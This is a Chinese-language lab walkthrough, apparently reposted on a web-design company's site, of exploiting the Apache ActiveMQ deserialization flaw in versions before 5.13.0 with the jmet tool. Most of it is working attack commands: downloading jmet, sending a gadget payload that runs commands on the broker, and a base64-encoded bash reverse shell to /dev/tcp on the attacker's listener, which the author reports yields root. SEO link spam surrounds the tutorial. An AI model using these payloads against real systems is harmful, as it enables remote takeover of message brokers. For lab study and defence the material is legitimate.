ActiveMQ反序列化任意命令执行漏洞的实例分析

本篇文章为大家展示了ActiveMQ反序列化任意命令执行漏洞的实例分析,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

成都创新互联公司主营平南网站建设的网络公司,主营网站建设方案,app开发定制,平南h5小程序开发搭建,平南网站营销推广欢迎平南等地区企业咨询

前言

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

利用

环境搭建:https://vulhub.org/#/docs/

工具下载:

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

kali :192.168.110.208

vulhub漏洞环境:192.168.110.213

首先进入jmet安装目录我这里安装在/opt下

远程创建文件:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/wys" -Yp ROME 192.168.110.213 61616

ActiveMQ反序列化任意命令执行漏洞的实例分析

此时会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://192.168.110.213:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:

ActiveMQ反序列化任意命令执行漏洞的实例分析

点击查看相应的id号消息即可触发命令执行

ActiveMQ反序列化任意命令执行漏洞的实例分析

此时进入容器

docker-compose exec activemq bash

发现创建的文件

ActiveMQ反序列化任意命令执行漏洞的实例分析

kali弹shell:

将bash -i >& /dev/tcp/192.168.110.208/8888 0>&1 base64编码得到

YmFzaCAtaSA+JiAvZGV2L3RjcC8xO.......yMDgvODg4OCAwPiYxCg==

ActiveMQ反序列化任意命令执行漏洞的实例分析

payload如下:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8x.......MDgvODg4OCAwPiYxCg==}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.110.213 61616

ActiveMQ反序列化任意命令执行漏洞的实例分析

kali监听,成功,拿到root权限

ActiveMQ反序列化任意命令执行漏洞的实例分析

上述内容就是ActiveMQ反序列化任意命令执行漏洞的实例分析,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注创新互联行业资讯频道。


网站名称:ActiveMQ反序列化任意命令执行漏洞的实例分析
标题来源:http://bzwzjz.com/article/jpjgsi.html

其他资讯

Copyright © 2007-2020 广东宝晨空调科技有限公司 All Rights Reserved 粤ICP备2022107769号
友情链接: 网站建设 公司网站建设 响应式网站设计方案 营销网站建设 成都网站建设 网站建设改版 成都品牌网站建设 手机网站建设 移动手机网站制作 成都网站建设推广 重庆网站制作 成都网站建设 四川成都网站制作 成都网站建设公司 成都网站建设公司 响应式网站设计 响应式网站设计 成都做网站建设公司 成都网站设计 营销型网站建设 高端网站设计推广 成都网站制作